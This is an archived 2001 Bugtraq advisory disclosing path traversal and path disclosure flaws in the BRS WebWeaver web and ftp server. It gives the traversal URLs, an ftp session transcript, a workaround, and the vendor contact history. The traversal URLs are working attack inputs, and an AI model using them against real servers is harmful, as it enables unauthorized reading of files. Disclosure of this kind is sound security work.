[20508] in bugtraq

home help back first fref pref prev next nref lref last post

Vulnerabilities in BRS WebWeaver

daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Apr 30 02:48:52 2001

Content-type: multipart/mixed;
              boundary="Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb"
Mime-version: 1.0
Message-ID:  <200104281953.MAA08631@user7.hushmail.com>
Date:         Sat, 28 Apr 2001 15:57:20 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM

--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb
Content-type: text/plain

----- Begin Hush Signed Message from joetesta@hushmail.com -----

Vulnerabilities in BRS WebWeaver



    Overview

BRS WebWeaver v0.63 is a combined ftp and web server available from
http://bsoutham.home.dhs.org.  Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (ie: '..', '...').  In addition, the ftp server
can be made to disclose the physical path of the ftp root.



    Details

The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]


The following is an illustration of the problem with the ftp server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>



    Solution

The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (ie: 'scripts').  There is no solution for the ftp root
disclosure vulnerability.



    Vendor Status

Blaine R Southam was contacted via <bsoutham@iname.com> on
Saturday, April 21, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb--

home help back first fref pref prev next nref lref last post